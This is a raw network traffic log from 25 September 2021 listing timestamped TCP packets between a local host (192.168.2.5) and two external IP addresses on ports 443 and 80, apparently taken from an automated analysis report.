Sep 25, 2021 10:15:03.069490910 CEST	49743	443	192.168.2.5	88.99.75.82
Sep 25, 2021 10:15:03.069518089 CEST	443	49743	88.99.75.82	192.168.2.5
Sep 25, 2021 10:15:03.069552898 CEST	49743	443	192.168.2.5	88.99.75.82
Sep 25, 2021 10:15:03.069592953 CEST	49743	443	192.168.2.5	88.99.75.82
Sep 25, 2021 10:15:03.080004930 CEST	49743	443	192.168.2.5	88.99.75.82
Sep 25, 2021 10:15:03.080039978 CEST	443	49743	88.99.75.82	192.168.2.5
Sep 25, 2021 10:15:03.223536968 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.245523930 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.245630980 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.246696949 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.271301031 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.361848116 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.361965895 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.365328074 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.387402058 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.387567043 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.387618065 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.387664080 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.387706995 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.387712002 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.387756109 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.387761116 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.387764931 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.387770891 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.387820005 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.387868881 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.387909889 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.387918949 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.387922049 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.387923002 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.387983084 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.388020992 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.388066053 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.388326883 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.410573006 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.410639048 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.410657883 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.410680056 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.410701990 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.410721064 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.410739899 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.410758018 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.410778046 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.410794973 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.410809994 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.410830021 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.410850048 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.410870075 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.410873890 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.410896063 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.410917044 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.410936117 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.410957098 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.410975933 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.410998106 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.411016941 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.411022902 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.411158085 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.433006048 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.433032990 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.433044910 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.433060884 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.433096886 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.433113098 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.433284044 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.433306932 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.433329105 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.433346987 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.433367968 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.433388948 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.433406115 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.433418036 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.433422089 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.433440924 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.433442116 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.433459044 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.433825970 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.433847904 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.433871031 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.433887005 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.433902979 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.433912039 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.433918953 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.433927059 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.433936119 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.433955908 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.433973074 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.433988094 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.434003115 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.434019089 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.434034109 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.434046030 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.434048891 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.434055090 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.434066057 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.434083939 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.434101105 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.434115887 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.434130907 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.434146881 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.434158087 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.434161901 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.434164047 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.434178114 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.434194088 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.434211969 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.434268951 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.434276104 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.455383062 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.455418110 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.455442905 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.455466032 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.455492973 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.455517054 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.455539942 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.455562115 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.455585003 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.455607891 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.455631018 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.455655098 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.455682039 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.455705881 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.455722094 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.455729008 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.455743074 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.455751896 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.455833912 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.455851078 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.456474066 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.456501007 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.456527948 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.456552029 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.456574917 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.456598043 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.456620932 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.456643105 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.456648111 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.456654072 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.456666946 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.456690073 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.456716061 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.456738949 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.456762075 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.456784964 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.456809044 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.456819057 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.456821918 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.456831932 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.456855059 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.456877947 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.456903934 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.456928015 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.456944942 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.456948042 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.456949949 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.456973076 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.456996918 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457020044 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.457020044 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457043886 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457067966 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457093000 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.457093954 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457118988 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457142115 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457164049 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457186937 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457200050 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.457204103 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.457210064 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457232952 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457257032 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457283974 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457307100 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457315922 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.457328081 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457351923 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457376003 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457397938 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457401991 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.457420111 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457442999 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457468987 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457493067 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457515001 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457531929 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.457535982 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.457536936 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457561016 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457596064 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457612038 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457619905 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457644939 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457655907 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.457664967 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457691908 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457715034 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457737923 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457761049 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457777023 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.457784891 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457807064 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457830906 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457833052 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.457854033 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457880974 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457906008 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457927942 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.457946062 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.457951069 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.458035946 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.458043098 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.477762938 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.477791071 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.477807999 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.477821112 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.477838039 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.477854013 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.477854967 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.477868080 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.477869987 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.477880955 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.477893114 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.477899075 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.477915049 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.477935076 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.477943897 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.477950096 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.477952957 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.477968931 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.477981091 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.477993011 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.477998972 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.478002071 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.478022099 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.478039980 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.478053093 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.478055954 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.478058100 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.478070974 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.478087902 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.478099108 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.478100061 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.478102922 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.478111982 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.478132963 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.478148937 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.478157043 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.478164911 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.478171110 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.478184938 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.478202105 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.478205919 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.478226900 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.478249073 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.478257895 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.478269100 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.478271008 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.478293896 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.478334904 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.478339911 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.479950905 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.479973078 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.479989052 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480004072 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480022907 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480032921 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.480051041 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.480149031 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480180979 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480205059 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480209112 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.480215073 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.480227947 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480242014 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480257988 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480277061 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480293989 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480309010 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480309963 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.480324984 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480336905 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.480341911 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480344057 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.480349064 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.480354071 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.480356932 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480372906 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480387926 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480393887 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.480407000 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480423927 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480439901 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480449915 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.480456114 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480457067 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.480472088 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480480909 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.480487108 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480503082 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480515003 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480528116 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480544090 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480562925 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480581999 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480585098 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.480602980 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480603933 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.480607986 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.480624914 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480628014 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.480643034 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.480647087 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480650902 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.480667114 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480670929 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.480685949 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480701923 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480704069 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.480720997 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480721951 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.480737925 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.480737925 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480755091 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480772018 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480772018 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.480787992 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480803013 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480815887 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.480818033 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480820894 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.480843067 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480863094 CEST	80	49744	159.69.203.58	192.168.2.5
